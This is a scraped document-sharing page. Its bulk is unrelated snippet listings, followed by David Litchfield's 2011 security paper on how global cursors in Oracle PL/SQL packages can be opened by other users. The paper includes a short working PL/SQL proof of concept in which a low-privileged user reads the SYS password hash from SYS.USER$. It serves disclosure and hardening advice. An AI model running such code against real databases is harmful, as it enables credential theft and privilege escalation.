The Security Impact of Global Cursors in Oracle PL/SQL 30 June ...
Recommend Documents
Jun 30, 2014 - Net income from Islamic Banking business. 214,111 .... Deposits and placements with banks and other finan
Aug 27, 2015 - Defined benefit plan actuarial gain/(loss). 30,202. (456). 35,087 ..... Issue of shares pursuant to. Divi
Jun 30, 2014 - (154,347). Shares issued pursuant to DRP. 16,024. 96,628. -. 112,652. Balance as at 30 June 2015. 2,588,4
Going beyond basic instruction, the curricula supplied by .... The “Spear and Gear
” Toastmasters' Club will host .... Comes with Original Box and Bass Knob ... 01
VOLVO S40 - 1.9L Turbo Great mpg, PW ... SUZUKI PARTS - M109/M90
Luggage rack ..
Oracle DBA who has worked with databases since. 1992, and with Oracle ......
9400. 29025. 29025. Source of example: Tom Kyte Effective Oracle by Design.
Jun 30, 2011 - Twitter @PCISSC. âmoreâ ... a global, open industry standards body providing management of the Paymen
Francisco, may know that the most important piece of furniture on the invest- ment
team floor is our .... Advanced Info Service Public Co., Ltd., a short position in U.S.
Treasury futures and ..... Home Inns & Hotels Management, Inc., Cnv. 2.000% .
Jun 30, 2016 - call center operations. From this and subsequent outreach and work, we developed as a key policy objectiv
Jun 30, 2018 - Emergency Procedure. As always, we are hopeful that nobody will get into difficulty during the event. How
Jun 30, 2011 - requirements and the Payment Application Data Security Standard (PA-DSS), today ... This form will gather
accreditation as part of a pilot program sponsored by Blue ... 2010 HONDA
ACCORD, 13K, steel gray, leather interior, ... lowering kit, handle bars, garaged,
no ...
Jun 30, 2002 ... THE SUMMONS, by John Grisham. (Doubleday, $27.95.) A law professor who
has been called home to Mississippi by his father, a dying judge, ...
Jan 1, 2019 - ... in terms of security and protection. ... process control, awareness, security, and safety. .... In what follows, we shed light on the most important sensors to be implemented in the closed workplaces ..... Visual; Ethernet; Wi-Fi.
1. PL/SQL Cursors. Cursors. ▫ Cursors allow embedded SQL statements. ▫
Result is a set (table) in a temporary work area. ▫ Cursor name permits iterative ...
Trigger Example in My SQL. • Procedures, Functions in MY SQL. • SQL in
application code such as C++ and Java. • Embedded SQL. • Cursors. • Dynamic
SQL.
The company also purchased ongoing software license, support, and ..... recommends consulting with their Oracle account
Given that the random oracle does provide only public information, the avenue of coming up with a ... As we explain in more details later, transfer- ability attacks ...
. Oracle Database Security Solutions. Eric Cheung. Senior
Manager, Technology Sales Consulting. [email protected]. May 2008 ...
tocols with universally composable security, in a model where all parties and all ...... The catch is that a corrupted party can ask for the signing key and this is the ...
Oracle Database Security Guide 10g Release 2 (10.2). B14266-09 ... Oracle and
Java are registered trademarks of Oracle and/or its affiliates. Other names may ...
Oracle Database Security Guide 11g Release 2 (11.2) .... Oracle Database 11g
Release 2 (11.2.0.2) New Security Features .................................................... xxvii.
Jun 30, 2011 ... Globals in PL/SQL are bad. This is well known in the Oracle community but
there's very little written on the matter beyond there's a general ...
The Security Impact of Global Cursors in Oracle PL/SQL
30th June 2011 David Litchfield
Globals in PL/SQL are bad. This is well known in the Oracle community but there's very little written on the matter beyond there's a general uneasy feeling that globals are bad. This paper will document why global cursors are particularly bad and using them could have a dire security impact on the database server. The problem arises because global cursors in Oracle can be opened and executed outside of the package in which they are defined; further this can be done by a user with a different security level than the owner of the package in which the cursor has been defined. To the uninitiated, this might be considered as unexpected. I certainly didn't expect this behaviour when I first came across it in 2006 and nor had any of my colleagues at NGSSoftware. In the code below, a security package is created to assess a given user's password. (It doesn't do anything practical and is used simply to highlight the problem with global cursors.) The code selects the password hash for the executing user and checks it. The user can't influence which password hash is selected - by using the user() function it is their password. As such an attacker can't abuse this to get the SYS password hash for example, unless of course, they're the SYS user. Besides, the password hash is never given and everything is wrapped up in the business logic so it's safe... Or is it?
SQL> CONNECT / AS SYSDBA Connected. SQL> -- WE'RE GOING TO SELECT THE USER'S PASSWORD HASH SQL> -- IT'S OK TO DO SO BECAUSE THIS IS WRAPPED UP IN SQL> -- BUSINESS LOGIC SO THEY DON'T GET TO SEE IT SQL> -- AND IT'S LIMITED TO THEIR OWN PASSWORD HASH SQL> -- BY USING THE USER() FUNCTION SQL> CREATE OR REPLACE PACKAGE SECCHECK AS 2 CURSOR X (USERNAME IN VARCHAR2) IS SELECT PASSWORD FROM SYS.USER$ WHERE NAME=USERNAME; 3 PROCEDURE CHECK_PASSWORD; 4 END; 5 / Package created. SQL> 2 3 4 5 6 7 8 9 10 11 12 13 14 15
CREATE OR REPLACE PACKAGE BODY SECCHECK AS PROCEDURE CHECK_PASSWORD IS PASSWORD VARCHAR2(200); BEGIN OPEN X (USER()); FETCH X INTO PASSWORD; CLOSE X; IF PASSWORD = '01234567890ABCDEF' THEN DBMS_OUTPUT.PUT_LINE('YOUR PASSWORD HASH IS NOT OK'); ELSE DBMS_OUTPUT.PUT_LINE('YOUR PASSWORD HASH IS OK'); END IF; END CHECK_PASSWORD; END; /
Package body created.
SQL> SHOW ERRORS No errors. SQL> GRANT EXECUTE ON SYS.SECCHECK TO PUBLIC; Grant succeeded. SQL> CONNECT SCOTT/TIGER Connected. SQL> SET SERVEROUTPUT ON SQL> EXEC SYS.SECCHECK.CHECK_PASSWORD; YOUR PASSWORD HASH IS OK PL/SQL procedure successfully completed. SQL>
This is all well and good. No password has is displayed and even if it was it'd only be the hash for the currently logged on user. But recall, a global cursor can be opened outside of the package so all an attacker needs to do to get the password for any user, for example the SYS user is to open it: SQL> DECLARE 2 PASSWORD VARCHAR2(200); 3 BEGIN 4 OPEN SYS.SECCHECK.X ('SYS'); 5 FETCH SYS.SECCHECK.X INTO PASSWORD; 6 CLOSE SYS.SECCHECK.X; 7 DBMS_OUTPUT.PUT_LINE('The SYS password is '|| PASSWORD); 8 END; 9 / The SYS password is E5C5EA198D2ED64A PL/SQL procedure successfully completed. SQL>
Global cursors are indeed bad. Oracle does not view this as a security weakness however and they refused to address it. I have some suggestions that could improve the security situation. Oracle could provide an optional server parameter that, if set, enforces a security check at the time the cursor is opened: if the cursor is being opened from outside of the package by a user that is not the owner then a security exception could be thrown. In the meantime, if you really, really must use a global cursor then assess how its use might impact the security of your system and if it could indeed allow a compromise then I'd advise finding a different solution.
